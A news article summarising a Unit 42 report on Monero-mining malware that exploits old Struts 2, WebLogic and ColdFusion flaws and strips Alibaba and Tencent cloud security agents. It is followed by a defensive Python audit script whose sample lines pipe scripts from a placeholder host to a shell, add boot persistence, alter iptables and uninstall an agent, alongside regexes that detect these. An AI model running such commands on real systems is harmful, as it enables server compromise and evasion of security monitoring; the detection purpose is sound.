Malware targets Alibaba Cloud and Tencent Cloud Server to mine cryptocurrency

A recent report from Palo Alto Networks' Unit 42 shows that hacker groups are currently developing malware specifically for infiltrating Linux servers to mine the Monero cryptocurrency.

The group mainly attacks cloud servers by exploiting vulnerabilities in Apache Struts 2, Oracle WebLogic, and Adobe ColdFusion. It is well known that older versions of these widely used products have serious security vulnerabilities. Of course, the flaws were disclosed long ago and have long been fixed in newer releases. There is no doubt, however, that many companies still have not upgraded and continue to run the old versions, and it is through these vulnerabilities that the attackers hope to infect servers.

Image: paloaltonetworks

The group's automated scripts use crawlers to scan individual websites and servers, and exploit a vulnerability to break in whenever one is detected. After a successful compromise, the malicious script is downloaded and registered to run at boot to maintain persistence, and it is then executed to use the processor's power to mine Monero.

In addition, the malicious script automatically configures iptables rules to block other malware, hides its own processes, and uninstalls other cloud security products.

The researchers found that the malware is aimed at users in China, as it uninstalls the security monitoring components of Alibaba Cloud and Tencent Cloud. Alibaba Cloud and Tencent Cloud are the cloud providers with the largest domestic market share, so the group added special handling for servers from these two brands.
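The behaviours described above (a remote script fetched and piped to a shell, boot-time persistence, iptables tampering, and uninstalling the cloud provider's security agent) are all visible in a host's cron and startup entries. The following is an added example of a small defender-side audit that flags such entries; it is not code from the Unit 42 report, the sample lines are constructed, and the URLs and the agent uninstall path are placeholders, not the real agents' paths.

```python
import re

# Constructed sample lines, as a host audit might collect them from crontab
# and rc.local. Hostnames and the agent path are placeholders for the example.
SAMPLE_LINES = [
    "@reboot curl -fsSL http://placeholder.example/x.sh | sh",
    "iptables -I INPUT -p tcp --dport 3333 -j DROP",
    "/usr/local/cloud-agent/uninstall.sh",  # placeholder for a cloud security agent uninstaller
    "0 3 * * * /usr/bin/logrotate /etc/logrotate.conf",  # benign entry
    "sh -c 'wget -q -O- http://placeholder.example/boot.sh | bash'",
]

# One rule per behaviour the report describes, each as a regex over a single line.
RULES = {
    "remote_script_piped_to_shell": re.compile(r"\b(curl|wget)\b[^|]*\|\s*(ba)?sh\b"),
    "boot_persistence": re.compile(r"^@reboot\b|/etc/rc\.local|/etc/init\.d/"),
    "firewall_tampering": re.compile(r"\biptables\b.*\s-[IA]\s"),
    "agent_uninstall": re.compile(r"\buninstall(\.sh)?\b|chkconfig\s+--del"),
}


def classify(line):
    """Return the names of all rules matching one line (empty list if none)."""
    return [name for name, rx in RULES.items() if rx.search(line)]


def scan(lines):
    """Return {line: [matched rule names]} for every line that matches a rule."""
    hits = {}
    for line in lines:
        matched = classify(line)
        if matched:
            hits[line] = matched
    return hits


if __name__ == "__main__":
    for line, rules in scan(SAMPLE_LINES).items():
        print(f"{', '.join(rules):45s} {line}")
```

Lines that match more than one rule (a boot-time entry that also pipes a downloaded script to a shell) are the ones worth looking at first.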

Of course, this malware does not attack only Alibaba Cloud and Tencent Cloud products, but it can at least be said that its author is very likely a Chinese hacker team.